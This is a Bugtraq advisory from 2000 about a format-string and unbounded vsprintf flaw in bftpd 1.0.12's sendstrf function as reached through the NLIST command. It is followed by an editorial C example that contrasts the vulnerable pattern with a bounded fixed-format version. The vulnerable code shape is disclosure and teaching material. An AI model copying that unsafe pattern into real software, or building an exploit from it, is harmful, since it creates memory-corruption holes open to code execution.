Date:         Wed, 6 Dec 2000 19:11:58 +0100
From: asynchro <asynchro@PKCREW.ORG>
Subject:      Malformed vsprintf in bftpd
To: BUGTRAQ@SECURITYFOCUS.COM


There is a malformed vsprintf in bftpd 1.0.12 in function sendstrf:

int sendstrf(int s, char *format, ...) {
 ....
  vsprintf(buffer, format, val);   /* unbounded write; format comes from the caller */

when the function is called from NLIST command:

  else
      foo = 1;
      sendstrf(s, entry->d_name);   /* d_name is passed as the format, not as an argument */
    }

This can be used to overflow the buffer of the vsprintf and execute
arbitrary code. I don't think it can be normally used for a remote attack
because bftpd removes all non-printable characters from input strings and
so it is not possible to remotely put a shellcode in a filename.
Demonstrative code is attached.


asynchro@pkcrew.org
www.pkcrew.org

Content-Disposition: attachment; filename="bf-code.c"
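Added editorial example (not the attached bf-code.c and not bftpd's own code): the vulnerable shape of sendstrf from the post beside a hardened form that keeps a fixed format and bounds the write. Writing into a caller-supplied buffer instead of the socket, the "%s\r\n" format and the constructed filenames are assumptions for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64
static char buffer[BUF_SIZE];

/* Vulnerable shape, as in the bftpd 1.0.12 excerpt: the caller's string is
   the format and vsprintf has no length bound. Only ever called here with a
   benign constructed name containing "%%", which is enough to prove the
   filename is parsed as a format string without any undefined behaviour. */
int sendstrf_vuln(const char *format, ...) {
    va_list val;
    va_start(val, format);
    int n = vsprintf(buffer, format, val);
    va_end(val);
    return n;
}

const char *last_buffer(void) { return buffer; }

/* Hardened form: the format is a literal chosen by the program, the data
   travels as an argument, and vsnprintf bounds the write. The return value
   is the length the full output would have had, so a caller can detect
   truncation by comparing it against outsz. */
static int sendstrf_safe(char *out, size_t outsz, const char *format, ...) {
    va_list val;
    va_start(val, format);
    int n = vsnprintf(out, outsz, format, val);
    va_end(val);
    return n;
}

/* NLIST call site rewritten: the directory entry name is an argument. */
int nlist_entry(char *out, size_t outsz, const char *d_name) {
    return sendstrf_safe(out, outsz, "%s\r\n", d_name);
}

/* Audit helper: any '%' in attacker-supplied data reaching a format
   parameter marks that call site as a format-string sink. */
int contains_conversion(const char *name) {
    return strchr(name, '%') != NULL;
}
```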